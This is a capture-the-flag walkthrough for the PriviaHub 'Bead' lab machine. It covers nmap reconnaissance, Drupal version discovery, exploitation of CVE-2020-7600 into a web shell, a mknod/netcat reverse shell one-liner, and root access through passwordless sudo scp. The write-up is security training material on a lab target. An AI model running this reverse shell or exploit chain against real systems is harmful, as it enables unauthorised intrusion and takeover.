Posts PriviaHub Bead Walkthourgh

PriviaHub Bead Walkthourgh

In this article we’re going to solve a vulnerable machine from PriviaHub Cyber Range Portal. Steps of the solution has described in below.


  • Nmap Scanning
  • Finding exact version of Drupal
  • Searching for exploit that belongs to version of Drupal


  • Exploitation with CVE-2020-7600
  • Getting reverse shell

Privilege Escalation

  • Abuse of scp binary


The machine IP is

As always we do I started with nmap scanning. I noticed that there are 2 open ports on the machine by running command that given in below.

nmap -sC -sV -oA nmap/bead-open-ports

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As a result of scanning, OpenSSH service is running on port 22 and http service is running on port 80. Also it’s clear that there are several directory and files I can reach.

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When I visit the web page by following 80 port, I realised this web page is Drupal content management system. The scenario to be done came to my mind. I had to find a vulnerability about Drupal but there is a problem. I didn’t know what is the exact version of drupal.

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Firstly, I ran whatweb tool and saw that what kind of technologies are using by the web site. It says that drupal has 7th version but that’s not enough. I have to find out which exact version does drupal have?

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After a little bit reconnaissance, CHANGELOG.txt gave me what I need, the version.


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It’s time to googling. I found a remote code execution vulnerability that drupal affected. This vulnerability has been published in exploitdb with CVE-2020-7600 code. Shortly, this exploit uploads a web shell to vulnerable system and gives us a terminal shell. I needed to upgrade my shell via reverse shell connection. This part was so hard for me because I tried many method but I couldn’t run my reverse shell payloads. After spending long time on google, I found a reverse shell payload that is making by mknod command.

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I set up a listener on port 1337 and sent a reverse connection from web shell with 0</tmp/backpipe p;/bin/sh /tmp/backpipenc 1337 1>/tmp/backpipe

Privilege Escalataion

Now I have real shell and I’m rain user on the system.

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For privilege escalation I checked that is there any binary can I use with sudo rights? As a result, I saw that I can use /bin/scp command with no required password. I think, GTFObins is the best place where we can find exploitable binaries. As you see in the picture, I followed the steps and got root rights.

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